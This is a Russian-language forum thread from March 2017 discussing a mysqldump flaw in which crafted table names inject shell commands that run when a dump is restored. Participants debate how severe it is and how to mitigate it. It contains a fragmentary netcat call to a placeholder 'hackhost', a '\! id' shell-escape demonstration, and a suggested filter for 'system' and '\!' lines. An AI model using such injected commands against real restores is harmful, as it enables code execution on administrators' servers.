Вариант для распечатки		Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы		[ Отслеживать ]

Уязвимость в mysqldump, позволяющая выполнить код при восста..., opennews (ok), 11-Мрт-17, (0) [смотреть все] Ну и бред Уязвимость тут на столько мифическая, что о ней можно и не говорить, Gemorroj (ok), 10:11 , 11-Мрт-17, (1) –12 // Не согласен, уязвимость хороша именно тем, что на первый взгляд кажется бесполез, Аноним (-), 10:16 , 11-Мрт-17, (2) +5 // Да, но это скорее еще один трюк из разряда методов социнженерии, чем реальная уя, KonstantinB (ok), 17:00 , 11-Мрт-17, (36) –1 // Более того, можно сделать так чтобы через браузер показывалось одно, а при загру, Аноним (-), 18:25 , 11-Мрт-17, (39) Ясен пень, что смотреть надо то, что запускать собрался, а не что там в браузере, KonstantinB (ok), 20:57 , 11-Мрт-17, (45) А в чем принципиальное отличие от старомодного скачать и запустить , angra (ok), 21:35 , 11-Мрт-17, (48) Старомодное предполагает разумный промежуточный шаг посмотреть, что собрался за, KonstantinB (ok), 21:41 , 11-Мрт-17, (49) Ни разу не видел, чтобы в инструкции был шаг Посмотрите, что вы собираетесь зап, angra (ok), 23:34 , 11-Мрт-17, (51) Не работайте под рутом тоже обычно не пишут в инструкциях по установке ПО Я о , KonstantinB (ok), 23:53 , 11-Мрт-17, (52) Вообще-то обычно в инструкциях указывается какие шаги делаются под пользователем, angra (ok), 00:25 , 12-Мрт-17, (56) Если curl взбрыкивает , то проблема либо с MITM, либо с тем местом, откуда раст, KonstantinB (ok), 03:27 , 13-Мрт-17, (64) –1 Сдается мне, что кое-кто не знает как работает механизм доверия ssl сертификату , angra (ok), 06:43 , 13-Мрт-17, (66) про -k и его более длинный алиас curl, кажется, сам подсказывает - если с wget, тигар (ok), 09:18 , 13-Мрт-17, (69) Очень даже может быть Но в таких случаях обычно звучит что-то вроде я же не ад, angra (ok), 10:15 , 13-Мрт-17, (71) Дада, проверьте что там в несколькогигабайтовом дампе базы данных, а потом расск, deadfood (ok), 20:13 , 12-Мрт-17, (61) +1 Если дамп мой - я и так знаю, что в нем Если нет - то в голову никогда не придет, KonstantinB (ok), 03:30 , 13-Мрт-17, (65) –1 в нем - create table shit nc hackhost 6666 dev null nc -, пох (?), 13:05 , 13-Мрт-17, (72) В дамп из-за sql injection Ну-ка наваляйте proof of concept , KonstantinB (ok), 16:00 , 13-Мрт-17, (75) только реалистичный, а не код, создающий динамически таблицы с подстановкой п, KonstantinB (ok), 16:04 , 13-Мрт-17, (76) 1 арендуешь шаредхостинг 2 создаешь сайт визитку 3 в mysql делаешь табличку , Аноним (-), 12:05 , 11-Мрт-17, (12) +6 // чем это отличается от ручного выполнения sql запроса из той же админки то, что , Gemorroj (ok), 12:58 , 11-Мрт-17, (14) –2 // Восстановление может делаться из-под более привилегированного юзера , Аноним (-), 18:27 , 11-Мрт-17, (40) +6 А почему собственно косяк в парсере не может быть уязвимостью , apollo2k4 (ok), 12:14 , 11-Мрт-17, (13) +3 // конкретно в mysqldump она не имеет ценности в силу сложности ее использования а, Gemorroj (ok), 13:00 , 11-Мрт-17, (15) –2 // Если вы не можете придумать, как это использовать, это не означает, что это нево, XoRe (ok), 23:55 , 11-Мрт-17, (53) +2 Каку надо писой мыть , Павел Самсонов (?), 13:18 , 11-Мрт-17, (18) +2 // И ещё подкладывть бумажку, и кушать ампицилин , Павел Самсонов (?), 13:23 , 11-Мрт-17, (20) Один сценарий для ее использования таки существует Дампу, снятому самостоятельн, angra (ok), 13:39 , 11-Мрт-17, (24) А часто ли бывает, что кто-то имеет право создавать таблицы, но не может делать , Аноним (-), 10:16 , 11-Мрт-17, (3) // Дефолтовые настройки аккаунта для WordPress , Аноним (-), 10:39 , 11-Мрт-17, (4) А какая разница Даже если бы злоумышленник мог делать дамп и восстанавливать, э, Аноним (-), 10:44 , 11-Мрт-17, (5) // А что раньше мешало подкинуть этому аккаунту исправленный дамп Дампы то у кли, angra (ok), 13:42 , 11-Мрт-17, (25) // Когда дампы хранятся у клиентов, то и восстанавливают их обычно клиенты , Аноним (-), 14:21 , 11-Мрт-17, (32) Разве что в идеальном мире Где все клиенты люди умные и знающие, а сисадмины ну, angra (ok), 21:32 , 11-Мрт-17, (47) Первые два абзаца полная чущь Причём здесь утилита mysqldump В оригинале ясно , Ydro (?), 11:19 , 11-Мрт-17, (8) –6 // Это вы не так поняли В оригинале написано как раз про атаку через выполнение CR, Аноним (-), 11:45 , 11-Мрт-17, (11) // У вас первый абзац оригинальной статьи видимо не отображается mysqldump is a co, Ydro (?), 13:19 , 11-Мрт-17, (19) –3 // Разъясняю для непонятливых Злоумышленник создаёт в БД таблицу с многострочным и, Аноним (-), 14:28 , 11-Мрт-17, (33) 1 mysqldump создаёт обычный кекстовый файл, sql-скрипт, с комментариями и проче, oopsy (?), 14:13 , 11-Мрт-17, (31) –1 // Не надо расписывать как работает mysqldump И отчего вы забыли другие виды комме, Ydro (?), 11:38 , 12-Мрт-17, (60) –2 Так 10 1 21 подвержена этой уязвимости или нет P S В оригинале понятно что не, Ilya Indigo (ok), 11:27 , 11-Мрт-17, (9) // Там в новости ссылка на CVE по ней пройди и увидишь, что в ветке 10 1 исправлено, КО (?), 19:34 , 11-Мрт-17, (43) +1 // Благодарю , Ilya Indigo (ok), 01:00 , 12-Мрт-17, (57) Ах эта тяга к идеализму С точки зрения промышленного станка - надёжность на д, Павел Самсонов (?), 13:01 , 11-Мрт-17, (16) Бывают случаи, когда хостер переносит базу с другого хостинга или восстанавливае, Alex_K (??), 13:17 , 11-Мрт-17, (17) +1 // ШОК Оказывается нельзя выполнять произвольный sql от рута, а надо логиниться , angra (ok), 13:28 , 11-Мрт-17, (21) +4 // Самое печальное, что при этом приходится сидеть на его стуле , Павел Самсонов (?), 13:30 , 11-Мрт-17, (22) // Как тут любит говорить Led, эникеи должны страдать Не хочешь работать ногами, р, angra (ok), 13:32 , 11-Мрт-17, (23) +1 Работать ногами - не есть плохо Жим платформы ногами, например Но и головой дум, vitvegl (?), 14:06 , 11-Мрт-17, (30) Хоть иногда стенки сверлю, а то как же дом построить , Павел Самсонов (?), 14:32 , 11-Мрт-17, (34) Не путайте пользователя root внутри mysql и системного пользователя , Alex_K (??), 13:45 , 11-Мрт-17, (26) // Я и не путаю Я вообще-то про обоих говорил Принцип один и тот же , angra (ok), 13:51 , 11-Мрт-17, (27) Ок , Alex_K (??), 14:02 , 11-Мрт-17, (29) Да какая разница, тот кто восстанавливает бакап обычно имеет права на файлы БД, , КО (?), 19:37 , 11-Мрт-17, (44) +1 Выводы 1 Под рутом ОС загружать сторонний дамп нельзя из-заsystem Exec, Alex_K (??), 14:00 , 11-Мрт-17, (28) +1   // нет, неправильные Правильные сторонний или даже собственноручный разницы совер, тоже аноним (?), 16:31 , 11-Мрт-17, (35)   // Да и у тебя они не правильные Действия для пользователя, требующие только знан, angra (ok), 17:39 , 11-Мрт-17, (37) –1   я не знаю пароля пользователя И не имею ни малейшего желания его знать su для s, Анон_ (?), 00:03 , 12-Мрт-17, (54) +1   Ну если ты ничего о мускуле знать не хочешь, то тебе наверное лучше его не админ, angra (ok), 03:25 , 12-Мрт-17, (59) –1   apt-get remove mysqld d windows_server setup exe , Аноним (-), 08:23 , 13-Мрт-17, (68)   apt-get remove работает с именами пакетов, а не бинарей на диске Ну это тебе ви, angra (ok), 10:13 , 13-Мрт-17, (70)   mysql в ней ровно тот же самый и из того же источника А mssql для вебни не внут, пох (?), 17:10 , 13-Мрт-17, (78)   Это, кстати, проблема именно mysql В postgresql это решаемо , KonstantinB (ok), 17:43 , 11-Мрт-17, (38)   Отложить в сторонку хеш пароля пользователя, установить случайный длинный, прийт, mickvav (?), 14:27 , 14-Мрт-17, (79)   Как вариант перед импортом дампа вырезать из него строки, которые начинаются с s, Alex_K (??), 19:03 , 11-Мрт-17, (41) –1   // Ну вот какую глупость только не придумают, лишь бы не делать правильно Ну выпол, angra (ok), 21:29 , 11-Мрт-17, (46)   Аутиста по решению важных вопросов видно из-далека , Аноним (-), 21:46 , 11-Мрт-17, (50) –1   правильная обработка untrusted input заключается ровно в обратном - вырезать все, Анон_ (?), 00:07 , 12-Мрт-17, (55)   Двойной тоже рвется , Сифилис (?), 01:49 , 12-Мрт-17, (58)   В MySQL все еще не завезли нормальные ACL для разграничения Events, Trigger, , Аноним (-), 19:31 , 11-Мрт-17, (42) –1 Вообще, это большой пласт проблем, на которые в mysql никогда даже не хотели раз, gogo (?), 21:08 , 12-Мрт-17, (62) // MySQL - Legacy РСБД с грязными хаками как IE6 для веб-макак Не имеет ничего обще, Аноним (-), 21:26 , 12-Мрт-17, (63) –1 // была бы она не для веб-макак, было бы пофигу, что там нет нормального restore Э, пох (?), 13:15 , 13-Мрт-17, (73) Ну, всё, конец света, вырубайте комп А прогнать дамп на поиск сочетания нежелат, Ydro (?), 08:22 , 13-Мрт-17, (67) –2 // а в дампе - статья с опеннета, описывающая проблему ну либо вовсе статья о разр, пох (?), 13:24 , 13-Мрт-17, (74) +2 1,3,8,9,16,17,42,62

Сообщения

[Сортировка по времени | RSS]

	28. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	+1 +/–
	Сообщение от Alex_K (??), 11-Мрт-17, 14:00
	Выводы: 1. Под рутом (ОС) загружать сторонний дамп нельзя из-за system    (\!) Execute a system shell command. 2. Даже дамп сделанный собственноручно (без skip-comments) загружать по рутом (ОС) небезопасно.
	Ответить | Правка | К родителю #17 | Наверх | Cообщить модератору

	35. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	+/–
	Сообщение от тоже аноним (?), 11-Мрт-17, 16:31
	> Выводы: нет, неправильные. Правильные: сторонний или даже собственноручный (разницы совершенно никакой, если только база не твоя собственная и create в ней не можешь делать только ты) дамп нельзя загружать под любым привиллегированным акаунтом самого mysql - что очень неудобно, поскольку обычная практика - не хранить пароли юзеров. При этом его еще и нельзя загружать под любым _своим_ системным акаунтом, даже нерутовым- потому что свой обычно позволяет sudo (с паролем, без пароля - похрен, подсунут тебе левый бинарник - ты еще и свой пароль дашь погонять) То есть владельцам shared надо заводить отдельную виртуалку со специальным акаунтом для восстановления (вероятно, автоматическую - запустил, сама всосала дамп, сама восстановила, самоуничтожилась вместе с содержимым, следующий запуск с исходного образа), а сам этот акаунт создавать каждый раз для каждого юзера (или таки хранить их пароли с риском что упрут) и все потому что какой-то долбодятел решил быть "щедрым" и не ограничил имена таблиц разумными рамками - "а чо, енжина ж может".
	Ответить | Правка | Наверх | Cообщить модератору

	37. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	–1 +/–
	Сообщение от angra (ok), 11-Мрт-17, 17:39
	Да и у тебя они не правильные :) Действия для пользователя, требующие только знаний, но не привилегий, надо делать из под пользователя(системного, БД, админка итд). Всегда и не только с sql дампами. Тогда не надо думать, сам ты сделал архив, дамп или еще что-то или не сам, может там быть что-то зловредное или не может. Это как с поворотниками или ремнями безопасности в машине, умный доводит их использование до автоматизма и не задумываясь использует даже если ему надо сто метров по дворам в три часа ночи проехать, а дурак начинает каждый раз размышлять: увидят гаишники или не увидят, есть другие машины или нет. Ну и в этом случае проблема не столько с именами таблиц, сколько с возможностью вообще выполнять шелловые команды из sql клиента.
	Ответить | Правка | Наверх | Cообщить модератору

	54. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	+1 +/–
	Сообщение от Анон_ (?), 12-Мрт-17, 00:03
	> Действия для пользователя, требующие только знаний, но не привилегий, надо делать из под > пользователя я не знаю пароля пользователя. И не имею ни малейшего желания его знать. su для sql почему-то не придумали. Кстати, если пользователя поломали, лезя в его акаунт, ты оказываешь ему (и, возможно, себе) медвежью услугу. > Ну и в этом случае проблема не столько с именами таблиц, сколько с возможностью вообще > выполнять шелловые команды вполне достаточно возможности выполнять _sql_ные команды (только совсем не create/insert). Включая и grant all. Чтобы этого избежать, нужен полноценный restore, а не скармливание дампа универсальному шеллу.
	Ответить | Правка | Наверх | Cообщить модератору

	59. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	–1 +/–
	Сообщение от angra (ok), 12-Мрт-17, 03:25
	> я не знаю пароля пользователя. И не имею ни малейшего желания его знать. > su для sql почему-то не придумали. Ну если ты ничего о мускуле знать не хочешь, то тебе наверное лучше его не админить. Админ без закидонов решает эту "проблему" в два счета.
	Ответить | Правка | Наверх | Cообщить модератору

	68. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	+/–
	Сообщение от Аноним (-), 13-Мрт-17, 08:23
	apt-get remove mysqld ? d:\windows_server\setup.exe ?
	Ответить | Правка | Наверх | Cообщить модератору

	70. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	+/–
	Сообщение от angra (ok), 13-Мрт-17, 10:13
	> apt-get remove mysqld ? apt-get remove работает с именами пакетов, а не бинарей на диске. > d:\windows_server\setup.exe ? Ну это тебе виднее, последний windows server, который я ставил, был 2003-й.
	Ответить | Правка | Наверх | Cообщить модератору

	78. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	+/–
	Сообщение от пох (?), 13-Мрт-17, 17:10
	> d:\windows_server\setup.exe ? mysql в ней ровно тот же самый и из того же источника. А mssql для вебни (не внутрикорпоративной, с пятикилобайтной "строкой" sql-запроса, но и с аж пятью пользователями, которых можно просто заставить не запускать ее одновременно с пяти мест, а паблик, с тысячами пользователей и примитивными insert/delete по полста в секунду) - боюсь, как бы не оказался еще худшим рeшетом, и еще большим тормозом и сборищем глюков. И в любом случае это отдельная жизнь, не каждому админу lamp-серверов она дана. (обратное тоже верно, судя по спаму, попершему пачками с хостингов гарант-парка)
	Ответить | Правка | К родителю #68 | Наверх | Cообщить модератору

	38. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	+/–
	Сообщение от KonstantinB (ok), 11-Мрт-17, 17:43
	> что очень неудобно, поскольку обычная практика - не хранить пароли юзеров Это, кстати, проблема именно mysql. В postgresql это решаемо.
	Ответить | Правка | К родителю #35 | Наверх | Cообщить модератору

	79. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	+/–
	Сообщение от mickvav (?), 14-Мрт-17, 14:27
	Отложить в сторонку хеш пароля пользователя, установить случайный длинный, прийти под этим паролем, поднять дамп, вернуть хеш на место - это как-то уже слишком сложно, да?
	Ответить | Правка | Наверх | Cообщить модератору

	41. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	–1 +/–
	Сообщение от Alex_K (??), 11-Мрт-17, 19:03
	Как вариант перед импортом дампа вырезать из него строки, которые начинаются с system или \!
	Ответить | Правка | К родителю #28 | Наверх | Cообщить модератору

	46. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	+/–
	Сообщение от angra (ok), 11-Мрт-17, 21:29
	Ну вот какую глупость только не придумают, лишь бы не делать правильно. Ну выполни в клиенте такую строку: select 1; \! id
	Ответить | Правка | Наверх | Cообщить модератору

	50. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	–1 +/–
	Сообщение от Аноним (-), 11-Мрт-17, 21:46
	Аутиста по решению важных вопросов видно из-далека.
	Ответить | Правка | К родителю #41 | Наверх | Cообщить модератору

	55. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	+/–
	Сообщение от Анон_ (?), 12-Мрт-17, 00:07
	> Как вариант перед импортом дампа вырезать из него строки, которые начинаются с > system или \! правильная обработка untrusted input заключается ровно в обратном - вырезать все строки, содержащие что-либо кроме create/insert в правильном sql-синтаксисе. проблема в том, что сама строка create с переводами строки - в правильном sql-синтаксисе, и правильно работает, проблемы будут потом у того, кто этот дамп еще где-то попытается залить без двойного презерватива.
	Ответить | Правка | К родителю #41 | Наверх | Cообщить модератору

	58. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	+/–
	Сообщение от Сифилис (?), 12-Мрт-17, 01:49
	Двойной тоже рвется
	Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема